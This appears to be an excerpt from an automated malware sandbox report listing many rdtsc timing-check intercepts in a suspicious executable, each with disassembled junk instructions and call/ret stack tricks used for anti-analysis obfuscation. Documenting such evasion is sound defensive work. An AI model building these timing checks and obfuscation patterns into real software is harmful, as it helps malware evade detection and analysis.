              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DFF7B second address: 6DFF8E instructions: 0x00000000 rdtsc 0x00000002 jno 00007FCD7C4F0D98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DFF8E second address: 6DFF98 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCD7D2AFB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DFF98 second address: 6E0000 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7C4F0DA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov esi, edx 0x0000000c push 00000000h 0x0000000e jmp 00007FCD7C4F0DA0h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007FCD7C4F0D98h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f mov di, ax 0x00000032 mov dword ptr [ebp+122D2F74h], ecx 0x00000038 xchg eax, ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b push edx 0x0000003c js 00007FCD7C4F0D96h 0x00000042 pop edx 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E0000 second address: 6E0005 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DD1EE second address: 6DD1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DD1F6 second address: 6DD204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DE62C second address: 6DE630 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6DE630 second address: 6DE636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E6488 second address: 6E6498 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCD7C4F0D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E6498 second address: 6E6516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCD7D2AFB0Eh 0x00000009 popad 0x0000000a pop ebx 0x0000000b nop 0x0000000c jc 00007FCD7D2AFB09h 0x00000012 adc bl, 00000043h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007FCD7D2AFB08h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 00000014h 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 mov bl, cl 0x00000033 push 00000000h 0x00000035 mov dword ptr [ebp+122D3257h], edx 0x0000003b xchg eax, esi 0x0000003c pushad 0x0000003d jmp 00007FCD7D2AFB18h 0x00000042 pushad 0x00000043 push esi 0x00000044 pop esi 0x00000045 pushad 0x00000046 popad 0x00000047 popad 0x00000048 popad 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FCD7D2AFB14h 0x00000051 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E7415 second address: 6E7429 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007FCD7C4F0D96h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E2AE5 second address: 6E2AF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E2AF6 second address: 6E2AFB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E761C second address: 6E7621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E7621 second address: 6E762B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FCD7C4F0D96h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E762B second address: 6E762F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E93D1 second address: 6E93D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E93D6 second address: 6E93E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FCD7D2AFB06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6EA527 second address: 6EA5A7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCD7C4F0D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov dword ptr [esp], eax 0x0000000e sub dword ptr [ebp+122D2593h], ebx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007FCD7C4F0D98h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 movsx edi, si 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ebp 0x00000038 call 00007FCD7C4F0D98h 0x0000003d pop ebp 0x0000003e mov dword ptr [esp+04h], ebp 0x00000042 add dword ptr [esp+04h], 00000016h 0x0000004a inc ebp 0x0000004b push ebp 0x0000004c ret 0x0000004d pop ebp 0x0000004e ret 0x0000004f mov bl, EEh 0x00000051 mov dword ptr [ebp+122D336Dh], edx 0x00000057 push eax 0x00000058 pushad 0x00000059 jp 00007FCD7C4F0DA6h 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E955B second address: 6E9560 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6EB4BA second address: 6EB4BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6EB4BF second address: 6EB4CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FCD7D2AFB06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6E9649 second address: 6E964F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6EA695 second address: 6EA699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6EA699 second address: 6EA6B2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCD7C4F0D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FCD7C4F0D9Dh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6ED496 second address: 6ED50B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 jnc 00007FCD7D2AFB0Ch 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FCD7D2AFB08h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a mov edi, dword ptr [ebp+122D340Fh] 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 call 00007FCD7D2AFB08h 0x0000003a pop eax 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f add dword ptr [esp+04h], 0000001Ch 0x00000047 inc eax 0x00000048 push eax 0x00000049 ret 0x0000004a pop eax 0x0000004b ret 0x0000004c push 00000000h 0x0000004e jp 00007FCD7D2AFB0Ch 0x00000054 mov dword ptr [ebp+12445A6Ah], esi 0x0000005a cld 0x0000005b xchg eax, esi 0x0000005c push esi 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6ED50B second address: 6ED511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6EB650 second address: 6EB656 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeRDTSC instruction interceptor: First address: 6EB656 second address: 6EB65C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6EB65C second address: 6EB660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6EB660 second address: 6EB664 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6ED66E second address: 6ED67E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 js 00007FCD7D2AFB0Eh 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6ED67E second address: 6ED70F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 nop 0x00000006 pushad 0x00000007 mov ecx, dword ptr [ebp+122D3277h] 0x0000000d add dword ptr [ebp+122D1B05h], edi 0x00000013 popad 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007FCD7C4F0D98h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 00000018h 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 mov edi, 24EF1581h 0x0000003a mov ebx, ecx 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 pushad 0x00000044 jmp 00007FCD7C4F0DA4h 0x00000049 mov dword ptr [ebp+122D2031h], esi 0x0000004f popad 0x00000050 mov eax, dword ptr [ebp+122D0489h] 0x00000056 jo 00007FCD7C4F0DA7h 0x0000005c jmp 00007FCD7C4F0DA1h 0x00000061 push FFFFFFFFh 0x00000063 mov ebx, dword ptr [ebp+122D3520h] 0x00000069 nop 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e push ebx 0x0000006f pop ebx 0x00000070 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6ED70F second address: 6ED719 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCD7D2AFB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6F0562 second address: 6F05EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FCD7C4F0D98h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push esi 0x00000028 call 00007FCD7C4F0D98h 0x0000002d pop esi 0x0000002e mov dword ptr [esp+04h], esi 0x00000032 add dword ptr [esp+04h], 00000018h 0x0000003a inc esi 0x0000003b push esi 0x0000003c ret 0x0000003d pop esi 0x0000003e ret 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push ecx 0x00000044 call 00007FCD7C4F0D98h 0x00000049 pop ecx 0x0000004a mov dword ptr [esp+04h], ecx 0x0000004e add dword ptr [esp+04h], 00000017h 0x00000056 inc ecx 0x00000057 push ecx 0x00000058 ret 0x00000059 pop ecx 0x0000005a ret 0x0000005b mov edi, dword ptr [ebp+122D342Dh] 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007FCD7C4F0DA8h 0x00000069 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6F1471 second address: 6F14DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edi, dword ptr [ebp+1244823Dh] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007FCD7D2AFB08h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 0000001Ch 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D336Dh], ecx 0x00000035 mov edi, dword ptr [ebp+122D3069h] 0x0000003b mov edi, dword ptr [ebp+1244823Dh] 0x00000041 push 00000000h 0x00000043 adc di, 47F3h 0x00000048 push eax 0x00000049 pushad 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6F14DC second address: 6F14E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6F476E second address: 6F47B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FCD7D2AFB1Fh 0x0000000f jmp 00007FCD7D2AFB19h 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FCD7D2AFB0Ch 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6F47B1 second address: 6F47B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6F0780 second address: 6F078D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FCD7D2AFB06h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6F47B7 second address: 6F47BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6F47BD second address: 6F47C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6EE614 second address: 6EE6BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCD7C4F0D9Ch 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FCD7C4F0DA7h 0x00000010 nop 0x00000011 mov ebx, dword ptr [ebp+122D357Ch] 0x00000017 push dword ptr fs:[00000000h] 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007FCD7C4F0D98h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 00000016h 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f mov dword ptr [ebp+122D1C3Eh], esi 0x00000045 mov eax, dword ptr [ebp+122D1175h] 0x0000004b push 00000000h 0x0000004d push ecx 0x0000004e call 00007FCD7C4F0D98h 0x00000053 pop ecx 0x00000054 mov dword ptr [esp+04h], ecx 0x00000058 add dword ptr [esp+04h], 00000018h 0x00000060 inc ecx 0x00000061 push ecx 0x00000062 ret 0x00000063 pop ecx 0x00000064 ret 0x00000065 jno 00007FCD7C4F0D9Ch 0x0000006b push FFFFFFFFh 0x0000006d movsx ebx, dx 0x00000070 push eax 0x00000071 pushad 0x00000072 jnp 00007FCD7C4F0D9Ch 0x00000078 push eax 0x00000079 push edx 0x0000007a pushad 0x0000007b popad 0x0000007c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6F5653 second address: 6F5665 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6F5665 second address: 6F566F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FCD7C4F0D96h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6F566F second address: 6F56B2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCD7D2AFB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007FCD7D2AFB08h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b mov ebx, dword ptr [ebp+122D3544h] 0x00000031 push 00000000h 0x00000033 mov ebx, 4540E079h 0x00000038 push eax 0x00000039 pushad 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6F4952 second address: 6F49D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FCD7C4F0D98h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov ebx, dword ptr [ebp+122D34C8h] 0x0000002b push dword ptr fs:[00000000h] 0x00000032 mov ebx, dword ptr [ebp+1244827Eh] 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f mov edi, dword ptr [ebp+122D33C5h] 0x00000045 mov eax, dword ptr [ebp+122D0139h] 0x0000004b push 00000000h 0x0000004d push eax 0x0000004e call 00007FCD7C4F0D98h 0x00000053 pop eax 0x00000054 mov dword ptr [esp+04h], eax 0x00000058 add dword ptr [esp+04h], 00000015h 0x00000060 inc eax 0x00000061 push eax 0x00000062 ret 0x00000063 pop eax 0x00000064 ret 0x00000065 sbb bx, E267h 0x0000006a push FFFFFFFFh 0x0000006c mov dword ptr [ebp+124631BBh], edx 0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 pushad 0x00000076 jg 00007FCD7C4F0D96h 0x0000007c pushad 0x0000007d popad 0x0000007e popad 0x0000007f rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6F49D6 second address: 6F49DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6F49DC second address: 6F49E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6FC183 second address: 6FC188 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6FC2F0 second address: 6FC2F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 704108 second address: 70410E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 70410E second address: 704132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007FCD7C4F0D9Ch 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCD7C4F0DA0h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 6A08E8 second address: 6A090A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB0Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FCD7D2AFB0Bh 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 70A25A second address: 70A26F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCD7C4F0D9Eh 0x00000008 jc 00007FCD7C4F0D96h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 70A26F second address: 70A27A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 70A27A second address: 70A29F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCD7C4F0DA7h 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 70A58D second address: 70A5B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 jmp 00007FCD7D2AFB16h 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 70A5B7 second address: 70A5BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 70A5BB second address: 70A5BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 70A5BF second address: 70A5C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 70A5C5 second address: 70A5DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCD7D2AFB16h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 70A72E second address: 70A73E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCD7C4F0D9Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 70A73E second address: 70A744 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 70A744 second address: 70A750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\zhQFKte2vX.exe RDTSC instruction interceptor: First address: 70F409 second address: 70F427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCD7D2AFB17h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c rdtsc
